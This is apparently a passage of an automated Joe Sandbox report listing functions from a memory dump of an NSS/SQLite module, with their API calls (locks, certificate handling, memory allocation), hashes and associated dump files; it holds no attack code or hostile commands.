Part of subcall function 6CA907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA2204A), ref: 6CA907AD
Part of subcall function 6CA907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA2204A), ref: 6CA907CD
Part of subcall function 6CA907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA2204A), ref: 6CA907D6
Part of subcall function 6CA907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA2204A), ref: 6CA907E4
Part of subcall function 6CA907A0: TlsSetValue.KERNEL32(00000000,?,6CA2204A), ref: 6CA90864
Part of subcall function 6CA907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA90880
Part of subcall function 6CA907A0: TlsSetValue.KERNEL32(00000000,?,?,6CA2204A), ref: 6CA908CB
Part of subcall function 6CA907A0: TlsGetValue.KERNEL32(?,?,6CA2204A), ref: 6CA908D7
Part of subcall function 6CA907A0: TlsGetValue.KERNEL32(?,?,6CA2204A), ref: 6CA908FB

TlsGetValue.KERNEL32 ref: 6CAB9CE8
EnterCriticalSection.KERNEL32(?,?,6CABECEC,6CAC2FCD,00000000,?,6CAC2FCD,?), ref: 6CAB9D01
TlsGetValue.KERNEL32(?,?,?,6CABECEC,6CAC2FCD,00000000,?,6CAC2FCD,?), ref: 6CAB9D38
EnterCriticalSection.KERNEL32(?,?,6CABECEC,6CAC2FCD,00000000,?,6CAC2FCD,?), ref: 6CAB9D4D
PR_Unlock.NSS3 ref: 6CAB9D70
PR_Unlock.NSS3 ref: 6CAB9DC3
PR_NewLock.NSS3 ref: 6CAB9DDD

Part of subcall function 6CAB88D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CAC0725,00000000,00000058), ref: 6CAB8906
Part of subcall function 6CAB88D0: EnterCriticalSection.KERNEL32(?), ref: 6CAB891A
Part of subcall function 6CAB88D0: PL_ArenaAllocate.NSS3(?,?), ref: 6CAB894A
Part of subcall function 6CAB88D0: calloc.MOZGLUE(00000001,6CAC072D,00000000,00000000,00000000,?,6CAC0725,00000000,00000058), ref: 6CAB8959
Part of subcall function 6CAB88D0: memset.VCRUNTIME140(?,00000000,?), ref: 6CAB8993
Part of subcall function 6CAB88D0: PR_Unlock.NSS3(?), ref: 6CAB89AF

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
String ID:
API String ID: 3394263606-0
Opcode ID: ec0bf35c28b6a1ad2657e964afc7e04b918eb2f951e1055244950dfd617655bd
Instruction ID: a3d535f3f0ec4efe7e0fcd2ec4694727f3b8026c95f04ccac5fd38da30f86fd1
Opcode Fuzzy Hash: ec0bf35c28b6a1ad2657e964afc7e04b918eb2f951e1055244950dfd617655bd
Instruction Fuzzy Hash: 63517174A047058FDB00EF79C28469EBBF8BF54345F158528D898ABB10EB30E8C4CB91

Function 6CBB9EA0 Relevance: 12.1, APIs: 8, Instructions: 136COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6CBB9EC0
EnterCriticalSection.KERNEL32(?), ref: 6CBB9EF9
_PR_MD_UNLOCK.NSS3(?), ref: 6CBB9F73
EnterCriticalSection.KERNEL32(?), ref: 6CBB9FA5
_PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6CBB9FCF
_PR_MD_UNLOCK.NSS3(?), ref: 6CBB9FF2
_PR_MD_UNLOCK.NSS3(?), ref: 6CBBA01D

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CriticalEnterSection
String ID:
API String ID: 1904992153-0
Opcode ID: a19a4d4dbfd5bfb0047336766bf30e4ecce65060d1f402243b8c912f2c6c7430
Instruction ID: 4a8cff1c3fd35e4aba61301b3e1b726fb0f612767a499d4a733ee1c6807f293b
Opcode Fuzzy Hash: a19a4d4dbfd5bfb0047336766bf30e4ecce65060d1f402243b8c912f2c6c7430
Instruction Fuzzy Hash: 71519FB2C00640CBCB209F26D48469AB7F4FF14319F15856AD85967F12EB31F889CBD2

Function 6CAC4E50 Relevance: 12.1, APIs: 8, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CAC4E90
EnterCriticalSection.KERNEL32 ref: 6CAC4EA9
TlsGetValue.KERNEL32 ref: 6CAC4EC6
EnterCriticalSection.KERNEL32 ref: 6CAC4EDF
PL_HashTableLookup.NSS3 ref: 6CAC4EF8
PR_Unlock.NSS3 ref: 6CAC4F05
PR_Now.NSS3 ref: 6CAC4F13
PR_Unlock.NSS3 ref: 6CAC4F3A

Part of subcall function 6CA907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA2204A), ref: 6CA907AD
Part of subcall function 6CA907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA2204A), ref: 6CA907CD
Part of subcall function 6CA907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA2204A), ref: 6CA907D6
Part of subcall function 6CA907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA2204A), ref: 6CA907E4
Part of subcall function 6CA907A0: TlsSetValue.KERNEL32(00000000,?,6CA2204A), ref: 6CA90864
Part of subcall function 6CA907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA90880
Part of subcall function 6CA907A0: TlsSetValue.KERNEL32(00000000,?,?,6CA2204A), ref: 6CA908CB
Part of subcall function 6CA907A0: TlsGetValue.KERNEL32(?,?,6CA2204A), ref: 6CA908D7
Part of subcall function 6CA907A0: TlsGetValue.KERNEL32(?,?,6CA2204A), ref: 6CA908FB

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID:
API String ID: 326028414-0
Opcode ID: 5cbad9cc890f8d5a57945cff3e062055b626e73407e9ce2bbb23e99b0973bc4d
Instruction ID: 56ed6462a2fdf3c2f5a054aedce4bca77706e317e1a82998cff7b2fb7e8901fd
Opcode Fuzzy Hash: 5cbad9cc890f8d5a57945cff3e062055b626e73407e9ce2bbb23e99b0973bc4d
Instruction Fuzzy Hash: 66415BB4A046058FCB00EF78D5848AABBF4FF49354B058569EC999B711EB30E895CFD1

Function 6CAADCE0 Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6CAADCFA

Part of subcall function 6CB69DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CBB0A27), ref: 6CB69DC6
Part of subcall function 6CB69DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CBB0A27), ref: 6CB69DD1
Part of subcall function 6CB69DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB69DED

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CAADD40
CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6CAADD62
CERT_DestroyCertificate.NSS3(?), ref: 6CAADD71
CERT_DestroyCertificate.NSS3(00000000), ref: 6CAADD81
CERT_RemoveCertListNode.NSS3(?), ref: 6CAADD8F

Part of subcall function 6CAC06A0: TlsGetValue.KERNEL32 ref: 6CAC06C2
Part of subcall function 6CAC06A0: EnterCriticalSection.KERNEL32(?), ref: 6CAC06D6
Part of subcall function 6CAC06A0: PR_Unlock.NSS3 ref: 6CAC06EB

CERT_DestroyCertificate.NSS3(?), ref: 6CAADD9E
CERT_DestroyCertificate.NSS3(?), ref: 6CAADDB7

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
String ID:
API String ID: 653623313-0
Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction ID: 58fe78e208775796886f9454e264f76cb5eea0c62533d6800c1d7e010fc2f813
Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction Fuzzy Hash: 0E21B1B6E021169BDF019FE4DD419DE77B4AF05308B180424EC54A7711F732E99ACBE1

Function 6CB35F60 Relevance: 12.1, APIs: 8, Instructions: 64COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6CB3AADB,?,?,?,?,?,?,?,?,00000000,?,6CB380C1), ref: 6CB35F72

Part of subcall function 6CA9ED70: DeleteCriticalSection.KERNEL32(?), ref: 6CA9ED8F
Part of subcall function 6CA9ED70: DeleteCriticalSection.KERNEL32(?), ref: 6CA9ED9E
Part of subcall function 6CA9ED70: DeleteCriticalSection.KERNEL32(?), ref: 6CA9EDA4

PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6CB3AADB,?,?,?,?,?,?,?,?,00000000,?,6CB380C1), ref: 6CB35F8F
DeleteCriticalSection.KERNEL32(00000001,00000000,00000000,?,6CB3AADB,?,?,?,?,?,?,?,?,00000000,?,6CB380C1), ref: 6CB35FCC
free.MOZGLUE(?,?,6CB3AADB,?,?,?,?,?,?,?,?,00000000,?,6CB380C1), ref: 6CB35FD3
DeleteCriticalSection.KERNEL32(00000001,00000000,00000000,?,6CB3AADB,?,?,?,?,?,?,?,?,00000000,?,6CB380C1), ref: 6CB35FF4
free.MOZGLUE(?,?,6CB3AADB,?,?,?,?,?,?,?,?,00000000,?,6CB380C1), ref: 6CB35FFB
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6CB3AADB,?,?,?,?,?,?,?,?,00000000,?,6CB380C1), ref: 6CB36019
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6CB3AADB,?,?,?,?,?,?,?,?,00000000,?,6CB380C1), ref: 6CB36036

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CriticalDeleteSection$DestroyMonitor$free
String ID:
API String ID: 227462623-0
Opcode ID: 21cef041f0dca8a743e87ad7f9414b8529597794423e8536d92c9941749b54dd
Instruction ID: 1640b5f244a2d19818b203699ec945d4cc4d3fc09f0baf0b88319909b123d077
Opcode Fuzzy Hash: 21cef041f0dca8a743e87ad7f9414b8529597794423e8536d92c9941749b54dd
Instruction Fuzzy Hash: F92147F1A04B409BEA219F75EC49BD377E8BB45708F100828E46E87741EB36F059CB92

Function 6CAA3C90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,6CB1460B,?,?), ref: 6CAA3CA9
EnterCriticalSection.KERNEL32(?), ref: 6CAA3CB9
PL_HashTableLookup.NSS3(?), ref: 6CAA3CC9
SECITEM_DupItem_Util.NSS3(00000000), ref: 6CAA3CD6
PR_Unlock.NSS3 ref: 6CAA3CE6
CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6CAA3CF6
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAA3D03
PR_Unlock.NSS3 ref: 6CAA3D15

Part of subcall function 6CB4DD70: TlsGetValue.KERNEL32 ref: 6CB4DD8C
Part of subcall function 6CB4DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB4DDB4

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
String ID:
API String ID: 1376842649-0
Opcode ID: 09ecb3b05fb162cfa55ff094ab7a8e7b62b0322ce1b295116c0f7697d87ff529
Instruction ID: a25b55d5ca9e07ab8f87b9f89db0f6bf9031fceb668ee1760b104d2f0a6daf9d
Opcode Fuzzy Hash: 09ecb3b05fb162cfa55ff094ab7a8e7b62b0322ce1b295116c0f7697d87ff529
Instruction Fuzzy Hash: 8C112C7AF01614ABDB111B74ED058AA7A78EB0225CB194534ED2C43B11F722D8DEC6D1

Function 6CAA9C50 Relevance: 10.8, APIs: 7, Instructions: 253stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CAC11C0: PR_NewLock.NSS3 ref: 6CAC1216

free.MOZGLUE(?), ref: 6CAA9E17
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAA9E25
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAA9E4E
TlsGetValue.KERNEL32 ref: 6CAA9EA2

Part of subcall function 6CAB9500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6CAB9546

EnterCriticalSection.KERNEL32(?), ref: 6CAA9EB6
PR_Unlock.NSS3 ref: 6CAA9ED9
PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CAA9F18

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
String ID:
API String ID: 3381623595-0
Opcode ID: ae2b86f727ea767613383e141c1acf9330ea4dbf5532fc32cdefa8970f5131a7
Instruction ID: 2ae2ffd932c141b1c7e9ff8de35e4f2b0075f16206e1ab882b9f989252ed800d
Opcode Fuzzy Hash: ae2b86f727ea767613383e141c1acf9330ea4dbf5532fc32cdefa8970f5131a7
Instruction Fuzzy Hash: 65812B75A00701ABE7109F74DE40AAB77B9FF55248F084528EC5997B02FB32E8D9C7A1

Function 6CABDCB0 Relevance: 10.7, APIs: 7, Instructions: 245stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CABAB10: DeleteCriticalSection.KERNEL32(D958E852,6CAC1397,5B5F5EC0,?,?,6CABB1EE,2404110F,?,?), ref: 6CABAB3C
Part of subcall function 6CABAB10: free.MOZGLUE(D958E836,?,6CABB1EE,2404110F,?,?), ref: 6CABAB49
Part of subcall function 6CABAB10: DeleteCriticalSection.KERNEL32(5D5E6CCB), ref: 6CABAB5C
Part of subcall function 6CABAB10: free.MOZGLUE(5D5E6CBF), ref: 6CABAB63
Part of subcall function 6CABAB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6CABAB6F
Part of subcall function 6CABAB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6CABAB76

TlsGetValue.KERNEL32 ref: 6CABDCFA
EnterCriticalSection.KERNEL32(00000000), ref: 6CABDD0E
PK11_IsFriendly.NSS3(?), ref: 6CABDD73
PK11_IsLoggedIn.NSS3(?,00000000), ref: 6CABDD8B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CABDE81
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CABDEA6
PR_Unlock.NSS3(?), ref: 6CABDF08

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
String ID:
API String ID: 519503562-0
Opcode ID: c208785dba5c1a9b7d211f59070c90d5d90ae992dabc18b5203acd81ab7e5204
Instruction ID: 973468be98aefe95a8bdf72a1366077e53a4d16259f2702a96294d8531aa1fbe
Opcode Fuzzy Hash: c208785dba5c1a9b7d211f59070c90d5d90ae992dabc18b5203acd81ab7e5204
Instruction Fuzzy Hash: E791E6B5E011059FEB00CF68D981BAABBB9FF44308F184029EC19AB745E731E995CB91

Function 6CA75FC0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000293F4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,6CB5BB62,00000004,6CBC4CA4,?,?,00000000,?,?,6CA331DB), ref: 6CA760AB
sqlite3_config.NSS3(00000004,6CBC4CA4,6CB5BB62,00000004,6CBC4CA4,?,?,00000000,?,?,6CA331DB), ref: 6CA760EB
sqlite3_config.NSS3(00000012,6CBC4CC4,?,?,6CB5BB62,00000004,6CBC4CA4,?,?,00000000,?,?,6CA331DB), ref: 6CA76122

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA76095
%s at line %d of [%.10s], xrefs: 6CA760A4
misuse, xrefs: 6CA7609F

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: sqlite3_config$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse
API String ID: 1634735548-648709467
Opcode ID: e9d81c457db2c11ef188365aaa97c1b4262e2ab15eb163bbe6e6d9ff0beaa6bc
Instruction ID: 8872e24d4a8201255fa320d605bf0dd3b37cc083f7c1b93d069d627d825023a7
Opcode Fuzzy Hash: e9d81c457db2c11ef188365aaa97c1b4262e2ab15eb163bbe6e6d9ff0beaa6bc
Instruction Fuzzy Hash: C6B14F74E0468ACFCB04CF6CD245AB9B7F4FB1E304B058159D519AB362E730AA85CFA5

Function 6CA24F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA24FC4
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA251BB

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA251A5
%s at line %d of [%.10s], xrefs: 6CA251B4
misuse, xrefs: 6CA251AF
unable to delete/modify user-function due to active statements, xrefs: 6CA251DF

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: sqlite3_logstrlen
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
API String ID: 3619038524-4115156624
Opcode ID: dc88f10ef28f9ad047d35c2892d05a753bece79fdccc49cb1a177cd8ff5fe769
Instruction ID: e324273803fab9cf2a44f79fca47f3ceeb6a4b06ccc3ecb5d11d1cbc9e836e08
Opcode Fuzzy Hash: dc88f10ef28f9ad047d35c2892d05a753bece79fdccc49cb1a177cd8ff5fe769
Instruction Fuzzy Hash: 7B71C075B082199FEB00CE15CD80B9AB7B5BF48308F0D4124FD199BA89D739EC90CBA1

Function 6CA92D20 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6CA92D69

Strings

winTruncate1, xrefs: 6CA92EBE
winUnmapfile2, xrefs: 6CA92F7F
winTruncate2, xrefs: 6CA92EF8
winSeekFile, xrefs: 6CA92E9C
winUnmapfile1, xrefs: 6CA92F55

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: __allrem
String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
API String ID: 2933888876-3221253098
Opcode ID: 38e1dae62d9f9d0e42cae267ff4e681ed2f57202c832a2adbd3525410bbbc923
Instruction ID: 089b7067f3f08bd0cbd782bdd1df5ba122b4635df6f461eb91157aad410702aa
Opcode Fuzzy Hash: 38e1dae62d9f9d0e42cae267ff4e681ed2f57202c832a2adbd3525410bbbc923
Instruction Fuzzy Hash: 2A619D75B002049FDB04CF68D885AAE7BF1FB49354F14822DE916AB790EB31AD46CB91

Function 6CB0FF10 Relevance: 10.7, APIs: 7, Instructions: 164memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400,?,?,00000000,00000000,?,6CB0F165,?), ref: 6CB0FF4B
PORT_ArenaAlloc_Util.NSS3(00000000,-000000F8,?,?,?,00000000,00000000,?,6CB0F165,?), ref: 6CB0FF6F
memset.VCRUNTIME140(00000000,00000000,-000000F8,?,?,?,?,?,00000000,00000000,?,6CB0F165,?), ref: 6CB0FF81
PORT_ArenaAlloc_Util.NSS3(00000000,-000000F8,?,?,?,?,?,00000000,00000000,?,6CB0F165,?), ref: 6CB0FF8D
memset.VCRUNTIME140(00000000,00000000,-000000F8,?,?,?,?,?,?,?,00000000,00000000,?,6CB0F165,?), ref: 6CB0FFA3
SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,6CB0F165,6CBD219C,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CB0FFC8
PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,00000000,00000000,?,6CB0F165,?), ref: 6CB100A6

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
